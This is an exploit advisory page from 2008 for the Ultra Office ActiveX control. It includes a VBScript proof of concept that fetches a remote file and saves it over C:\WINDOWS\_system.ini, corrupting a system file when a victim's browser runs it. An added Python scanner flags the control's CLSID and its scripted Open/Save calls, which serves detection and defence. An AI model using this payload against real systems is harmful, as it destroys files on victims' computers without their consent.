Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

2008.09.03
Credit: shinnai
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

-----------------------------------------------------------------------------
 Ultra Office ActiveX Control Remote Arbitrary File Corruption
 url: http://www.ultrashareware.com

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 This was written for educational purpose. Use it at your own risk.
 Author will not be responsible for any damage.

 Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------

<object classid='clsid:00989888-BB72-4e31-A7C6-5F819C24D2F7' id='test'></object>

<input language=VBScript type=button value='Click here to start the test'>

<script language='vbscript'>
 Sub tryMe
  dim remURL
  remURL = "http://SomeSite.com/SomeFile.doc"
  test.Open remURL, True
  test.Save "C:\WINDOWS\_system.ini", True
 End Sub
</script>
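
For detection, the proof of concept above has two observable features: an object tag bound to the control's CLSID, and script calls to Open or Save on that object's id. The following is an added example, not part of the original advisory or the vendor's code, that flags both in an HTML document; the function and class names and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID copied from the advisory; compared upper-cased, without "clsid:" or braces.
ULTRA_OFFICE_CLSID = "00989888-BB72-4E31-A7C6-5F819C24D2F7"

class ControlFinder(HTMLParser):
    """Collect ids of <object> tags bound to the CLSID, plus all script text."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.script_text, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "object":
            classid = (a.get("classid") or "").upper().replace("CLSID:", "")
            if classid.strip("{} ") == ULTRA_OFFICE_CLSID:
                self.object_ids.append(a.get("id") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)

def scan_page(html):
    """Return findings for one HTML document (proxy, mail gateway or IR triage)."""
    finder = ControlFinder()
    finder.feed(html)
    finder.close()
    script = "".join(finder.script_text)
    findings = []
    for obj_id in finder.object_ids:
        findings.append(("control-instantiated", obj_id))
        if obj_id:  # look for scripted calls on this object's id
            pattern = r"\b%s\s*\.\s*(Open|Save)\b" % re.escape(obj_id)
            for m in re.finditer(pattern, script, re.IGNORECASE):
                findings.append(("scripted-call", m.group(1).capitalize()))
    return findings

# Constructed sample page, not captured traffic.
SAMPLE = """<object classid="CLSID:{00989888-bb72-4e31-a7c6-5f819c24d2f7}" id="doc"></object>
<script language="vbscript">
doc.Open "http://example.invalid/a.doc", True
doc.Save "C:\\temp\\a.doc", True
</script>"""
```

A page that only instantiates the control still yields a `control-instantiated` finding, which is worth alerting on by itself when the control is not expected in the environment.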

References:

http://www.shinnai.net/xplits/TXT_NPku7jFjRufaz85U6Lxn.html
http://www.shinnai.net/index.php?mod=02_Forum&group=Security&argument=Remote_performed_exploits&topic=1219827906.ff.php
http://www.securityfocus.com/bid/30863
http://www.milw0rm.com/exploits/6319
http://secunia.com/advisories/31632

